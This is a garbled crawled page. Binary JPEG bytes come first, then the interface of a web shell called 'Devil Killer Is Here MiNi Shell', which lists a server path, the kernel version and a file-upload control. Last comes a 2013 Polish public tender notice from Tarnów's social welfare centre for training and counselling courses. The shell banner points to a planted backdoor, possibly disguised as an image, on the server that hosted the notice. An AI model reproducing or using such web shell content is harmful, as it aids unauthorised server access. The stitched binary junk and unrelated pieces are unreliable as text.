JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130903/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130903/176505-N-2013.html

<p class="kh_header"><b>Tarnów: Organizacja i przeprowadzenie  poradnictw, warsztatów, kursów, szkoleń dla uczestników Programu Aktywności Lokalnej  w ramach realizowanego przez Miejski Ośrodek Pomocy Społecznej w Tarnowie projektu  systemowego pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 176505 - 2013; data zamieszczenia: 03.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Tarnowie , Al. Matki Bożej Fatimskiej 9, 33-100 Tarnów, woj. małopolskie, tel. 14 688 20 20, faks 14 688 20 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie  poradnictw, warsztatów, kursów, szkoleń dla uczestników Programu Aktywności Lokalnej  w ramach realizowanego przez Miejski Ośrodek Pomocy Społecznej w Tarnowie projektu  systemowego pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie poradnictw, doradztwa,kursów,szkoleń dla  58 osób w wieku aktywności zawodowej, uczestników Programu Aktywności Lokalnej w ramach realizowanego przez Zamawiającego projektu pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1. Zamówienie zostało podzielone na cztery części. Zadanie I: Zorganizowanie i przeprowadzenie poradnictw, szkolenia: A) Zorganizowanie i przeprowadzenie szkolenia Szkoła dla rodziców, B) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa rodzinnego, C) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa pracy, D) Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Budowanie własnego wizerunku. Zadanie II: Zorganizowanie i przeprowadzenie A) Kurs obsługi kasy fiskalnej, B) Kurs fakturzysta z obsługą kasy fiskalnej. Zadanie III  -  Zorganizowanie i przeprowadzenie kursu - opiekun środowiskowy. Zadanie IV: Zorganizowanie i przeprowadzenie  warsztatów aktywnego poszukiwania pracy
Uwagi dotyczące  poradnictw/warsztatów/kursów/szkoleń wchodzących w zakres zadań: 
1)	każde zadanie stanowi oddzielną  część zamówienia, 
2)	ilekroć w opisie  zajęć występuje słowo godzina, należy przez to rozumieć 45 minut,  
z wyłączeniem przypadków gdy regulacje prawne określające zasady prowadzenia poradnictwa,doradztwa,kursu, szkolenia  wskazują, że przez godzinę należy rozumieć 60 minut, 
3)	miejsce realizacji zajęć - zajęcia muszą odbywać się w granicach administracyjnych miasta Tarnowa,
4)	nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learingu, w formie eksternistycznej itp., 
5)	zajęcia teoretyczne i praktyczne będą mogły odbywać się od poniedziałku do piątku 
(z wyłączeniem dni ustawowo wolnych od pracy), w wymiarze nie większym niż 8 godzin zajęć szkoleniowych  dziennie (nie wliczając przerw). Zamawiający dopuszcza  możliwość, aby zajęcia odbywały się  również w  soboty w wymiarze nie większym niż 8 godzin szkoleniowych - po wcześniejszym uzgodnieniu terminu zajęć z przedstawicielem Zamawiającego, 
6)	czas trwania egzaminu (sprawdzianu) nie może być ujęty w liczbie godzin programu poradnictwa, warsztatu, kursu, szkolenia, chyba, że przepisy prawne stanowią inaczej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9, 79.11.10.00-5, 79.14.00.00-7, 85.12.12.70-6, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w przypadku zadań:  Nr I, II, III - Wykonawca spełni niniejszy warunek jeżeli jest wpisany do  rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy  właściwy ze względu na  siedzibę  Wykonawcy - zgodnie z  art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r.  poz. 674,  z późn. zm.). 
W przypadku zadania Nr IV: Zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania  pracy: 
Wykonawca spełni niniejszy warunek jeżeli: 
1.  jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na  siedzibę  Wykonawcy - zgodnie z  art. 20 ust. 1 ustawy z dnia 20 kwietnia  2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r.  poz. 674,  z późn. zm.).
2. działalność  gospodarcza Wykonawcy  w  zakresie świadczenia usług poradnictwa zawodowego jest wpisana do rejestru podmiotów prowadzących agencje zatrudnienia, prowadzonego przez marszałka województwa właściwego dla siedziby  Wykonawcy.  
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych (dotyczy zadań  I - IV)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania  tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych (dotyczy zadań  I - IV)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  szczególnych wymagań w zakresie spełniania  tego warunku. Wykonawca potwierdza spełnianie warunku poprzez  złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych (dotyczy zadań  I - IV)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia jeżeli:
1. w zakresie zadania I: 

A) Zorganizowanie i przeprowadzenie szkolenia Szkoła dla rodziców:
Wykonawca wykaże, że dysponuje lub będzie dysponować łącznie: 
a)   w przypadku modułu I, II, III - co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą dyplom ukończenia studiów psychologicznych, która przeprowadziła minimum jedno szkolenie (kurs, poradnictwo, warsztat, doradztwo, zajęcie), którego zakres tematyczny przynajmniej jednego modułu odpowiada tematyce będącej przedmiotem zamówienia (moduły występujące w  opisie przedmiotu zamówienia - I moduł - budowanie relacji rodzic - dziecko, II moduł - relacje między rodzeństwem oraz rówieśnikami, III moduł - trudności występujące w wieku dorastania,
b) w przypadku modułu IV - co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą dyplom ukończenia studiów prawniczych, która przeprowadziła minimum jedno szkolenie (kurs, poradnictwo, warsztat, doradztwo, zajęcie), którego zakres tematyczny  obejmował  przynajmniej następujące zagadnienia z zakresu modułu IV: władza rodzicielska, obowiązek alimentacyjny, ustanie małżeństwa,

zadania I B) Zorganizowanie i przeprowadzenie poradnictwa z  prawnikiem  z zakresu prawa rodzinnego:  
Wykonawca wykaże, że dysponuje lub będzie dysponować osobą posiadającą dyplom ukończenia studiów prawniczych, która będzie uczestniczyć w wykonywaniu zamówienia, która przeprowadziła minimum jedno  poradnictwo (kurs,  warsztat, doradztwo, zajęcie, szkolenie), którego zakres tematyczny  obejmował   przynajmniej następujące zagadnienia z  zakresu prawa rodzinnego: władza rodzicielska, rozwiązanie małżeństwa przez rozwód, majątkowe ustroje małżeńskie, obowiązek alimentacyjny, 

zadania I C) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa pracy:  
Wykonawca wykaże, że dysponuje lub będzie dysponować osobą posiadającą dyplom ukończenia studiów prawniczych, która będzie uczestniczyć w wykonywaniu zamówienia, która przeprowadziła minimum jedno  poradnictwo (kurs,  warsztat, doradztwo, zajęcie, szkolenie), którego zakres tematyczny przynajmniej  dwóch  modułów  odpowiada tematyce będącej przedmiotem zamówienia (moduły występujące w opisie przedmiotu zamówienia :  I moduł  - nawiązywanie umów o pracę, II moduł - zatrudnianie, III moduł - zmiana warunków  zatrudnienia i rozwiązywanie umów o pracę, IV moduł -  czas pracy, praca w godzinach nadliczbowych, w porze nocnej oraz w niedziele i święta), 

zadania I D) Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Budowanie własnego wizerunku
Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej jedną  osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą dyplom ukończenia studiów psychologicznych, która przeprowadziła minimum jedno poradnictwo (kurs,  szkolenie,  warsztat, doradztwo, zajęcie), którego zakres tematyczny obejmował przynajmniej następujące  zagadnienia  z zakresu budowania własnego wizerunku:  techniki wywierania pozytywnego wrażenia, efektywna komunikacja jako narzędzie autoprezentacji, profesjonalna prezentacja,

2. w zakresie zadania II: Zorganizowanie i przeprowadzenie: 
A) kursu obsługi kasy fiskalnej, 
B) kursu  fakturzysta z obsługą kasy fiskalnej: 

Wykonawca wykaże, że  dysponuje lub będzie  dysponować co najmniej jedną osobą (w przypadku każdego kursu), która będzie uczestniczyć w wykonywaniu zamówienia, która  uczestniczyła  - w charakterze wykładowcy, trenera, instruktora,  itp. w realizacji minimum  jednego kursu (szkolenia, zajęcia), którego zakres tematyczny odpowiada tematyce będącej przedmiotem zamówienia, tj. obsługi kas  fiskalnych (zadanie II A) oraz obsługi programów fakturujących i kas fiskalnych  (zadanie II B)

3. w  zakresie zadania III: Zorganizowanie i przeprowadzenie kursu -  opiekun środowiskowy: 
Wykonawca wykaże, że  dysponuje lub będzie  dysponować co najmniej  jedną osobą, które będą uczestniczyć w wykonywaniu zamówienia, które  uczestniczyły  - w charakterze wykładowcy, trenera, instruktora,  itp. w realizacji minimum  jednego kursu  (szkolenia, zajęcia), którego zakres tematyczny obejmował przynajmniej następujące zagadnienia: wybrane zagadnienia z zakresu psychologii, podstawy higieny i pielęgnacji, udzielanie pomocy przedmedycznej, 

4. w zakresie zadania IV: Zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania pracy: 
Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą  uprawnienia do  wykonywania zawodu doradcy zawodowego, która przeprowadziła minimum jeden warsztat (kurs, szkolenie, poradnictwo, doradztwo, zajęcie), którego zakres tematyczny obejmował przynajmniej następujące zagadnienia: metody poszukiwania pracy.
Zamawiający dokona oceny spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia na podstawie (dotyczy zadań nr  I - IV):
a) oświadczenia złożonego przez Wykonawcę o spełnianiu warunków udziału  w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych,
b) przedstawionego przez Wykonawcę - Wykazu osób, które będą uczestniczyć  w wykonywaniu zamówienia, w szczególności odpowiedzialnych  za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie do dysponowania tymi osobami - sporządzonego według wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia, 
c)oświadczenia złożonego przez Wykonawcę, że osoby, które będą uczestniczyć  w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  sporządzonego według wzoru stanowiącego załącznik nr 3 do specyfikacji istotnych warunków zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania  tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 Prawa zamówień publicznych (dotyczy zadań  I - IV)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć pełnomocnictwo: a) jeżeli oferta została podpisana przez pełnomocnika (o ile nie wynika to z innych dokumentów załączonych do oferty), b) w przypadku składania oferty wspólnej. Jeżeli osoba (osoby) podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa musi być poświadczona notarialnie). Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, na zasadach określonych w art. 26 ust. 2b Prawa zamówień publicznych, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III 4.3.1), zastępuje się je dokumentem, zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2. Zmiany postanowień umowy mogą dotyczyć:
a) zmiany w harmonogramie szkoleń (za zgodą Zamawiającego), tylko w uzasadnionych przypadkach, pod warunkiem zachowania ostatecznego terminu realizacji umowy, 
b) zmiany osób, które będą uczestniczyć w realizacji zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz,  że osoba nie wykazana w ofercie, a wskazana przez Wykonawcę do realizacji zamówienia, będzie posiadała wykształcenie, kwalifikacje i doświadczenie odpowiadające wymaganiom Zamawiającego określone w specyfikacji istotnych warunków zamówienia - po pisemnym zawiadomieniu Zamawiającego i uzyskaniu zgody Zamawiającego, 
c) zwiększenia wymiaru zajęć w poszczególnych dniach szkolenia - powyżej 8 godzin zajęć szkoleniowych  dziennie  oraz  zwiększenia liczby dni w tygodniu, w których będą mogły odbywać się zajęcia - do  siedmiu dni w tygodniu,  po wcześniejszym uzgodnieniu terminu zajęć z przedstawicielem Zamawiającego, 
d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, 
e) zaistnienia siły wyższej mającej wpływ na realizację umowy, 
f) zmiany  miejsca  prowadzenia szkoleń - po uzyskaniu pisemnej zgody  Zamawiającego, 
g) nieistotnych zmian postanowień umowy w stosunku do treści oferty, wg której dokonano wyboru Wykonawcy (np. osoby upoważnionej do kontaktów, numerów telefonów, adresów wskazanych w umowie). 
3. Warunkiem dokonania zmiany jest zawiadomienie o zaistnieniu w/w okoliczności w formie pisemnej. Zgodę na dokonanie zmian musi wyrazić każda ze stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> portal.mops.tarnow.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Tarnowie, al. Matki Bożej Fatimskiej 9, 33 - 100 Tarnów.</p>
